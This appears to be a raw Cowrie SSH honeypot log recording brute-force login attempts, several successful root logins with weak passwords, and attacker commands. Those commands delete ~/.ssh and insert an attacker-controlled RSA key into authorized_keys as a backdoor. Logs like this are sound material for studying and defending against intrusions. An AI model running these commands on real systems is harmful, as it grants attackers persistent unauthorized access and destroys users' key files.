{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":50354,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d825cd75219","protocol":"ssh","message":"New connection: 199.195.248.191:50354 (1.2.3.4:22) [session: 4d825cd75219]","sensor":"my-vps","timestamp":"2025-08-26T19:57:22.622033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:57:22.624949Z","src_ip":"199.195.248.191","session":"4d825cd75219"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:57:22.711052Z","src_ip":"199.195.248.191","session":"4d825cd75219"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T19:57:23.070238Z","src_ip":"212.227.235.229","session":"89e7d9c9aa2a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:57:23.074966Z","src_ip":"199.195.248.191","session":"4d825cd75219"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:23.172648Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:23.173720Z","src_ip":"199.195.248.191","session":"4d825cd75219"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:24.199358Z","src_ip":"212.227.235.229","session":"89e7d9c9aa2a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":40390,"dst_ip":"1.2.3.4","dst_port":22,"session":"050d991afbc3","protocol":"ssh","message":"New connection: 217.154.1.158:40390 (1.2.3.4:22) [session: 050d991afbc3]","sensor":"my-vps","timestamp":"2025-08-26T19:57:38.172847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:57:38.173661Z","src_ip":"217.154.1.158","session":"050d991afbc3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:57:38.189104Z","src_ip":"217.154.1.158","session":"050d991afbc3"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-26T19:57:38.233416Z","src_ip":"217.154.1.158","session":"050d991afbc3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:39.249340Z","src_ip":"217.154.1.158","session":"050d991afbc3"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:39.664750Z","src_ip":"212.227.235.229","session":"34b45c89b40c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48802,"dst_ip":"1.2.3.4","dst_port":22,"session":"4371d4098275","protocol":"ssh","message":"New connection: 212.227.235.229:48802 (1.2.3.4:22) [session: 4371d4098275]","sensor":"my-vps","timestamp":"2025-08-26T19:57:42.672790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:57:42.674188Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:57:42.915862Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:57:43.883161Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:57:44.449598Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:57:44.450308Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:57:44.451495Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:44.695726Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:57:45.196168Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:57:45.196843Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56252,"dst_ip":"1.2.3.4","dst_port":22,"session":"77270eff49a3","protocol":"ssh","message":"New connection: 217.154.1.158:56252 (1.2.3.4:22) [session: 77270eff49a3]","sensor":"my-vps","timestamp":"2025-08-26T19:57:55.529605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:57:55.530394Z","src_ip":"217.154.1.158","session":"77270eff49a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:57:55.545130Z","src_ip":"217.154.1.158","session":"77270eff49a3"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-26T19:57:55.588626Z","src_ip":"217.154.1.158","session":"77270eff49a3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:56.605574Z","src_ip":"217.154.1.158","session":"77270eff49a3"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56186,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd70706f2b05","protocol":"ssh","message":"New connection: 217.154.1.158:56186 (1.2.3.4:22) [session: fd70706f2b05]","sensor":"my-vps","timestamp":"2025-08-26T19:58:13.129931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:58:13.130571Z","src_ip":"217.154.1.158","session":"fd70706f2b05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:58:13.146437Z","src_ip":"217.154.1.158","session":"fd70706f2b05"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-26T19:58:13.191000Z","src_ip":"217.154.1.158","session":"fd70706f2b05"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:14.207613Z","src_ip":"217.154.1.158","session":"fd70706f2b05"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":47650,"dst_ip":"1.2.3.4","dst_port":22,"session":"0867f27bd2ce","protocol":"ssh","message":"New connection: 199.195.248.191:47650 (1.2.3.4:22) [session: 0867f27bd2ce]","sensor":"my-vps","timestamp":"2025-08-26T19:58:24.479177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:58:24.485487Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:58:24.574794Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.login.success","username":"root","password":"Su123123","message":"login attempt [root/Su123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:58:24.944124Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:58:25.227558Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.228415Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.229757Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.323339Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:58:25.603025Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.603782Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.703468Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.704444Z","src_ip":"199.195.248.191","session":"0867f27bd2ce"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":48264,"dst_ip":"1.2.3.4","dst_port":22,"session":"487f3012b256","protocol":"ssh","message":"New connection: 199.195.248.191:48264 (1.2.3.4:22) [session: 487f3012b256]","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.788556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.801477Z","src_ip":"199.195.248.191","session":"487f3012b256"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:58:25.886756Z","src_ip":"199.195.248.191","session":"487f3012b256"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:58:26.236287Z","src_ip":"199.195.248.191","session":"487f3012b256"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:58:27.330512Z","src_ip":"199.195.248.191","session":"487f3012b256"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":48904,"dst_ip":"1.2.3.4","dst_port":22,"session":"24ff8f595aed","protocol":"ssh","message":"New connection: 199.195.248.191:48904 (1.2.3.4:22) [session: 24ff8f595aed]","sensor":"my-vps","timestamp":"2025-08-26T19:58:27.415597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:58:27.424854Z","src_ip":"199.195.248.191","session":"24ff8f595aed"}
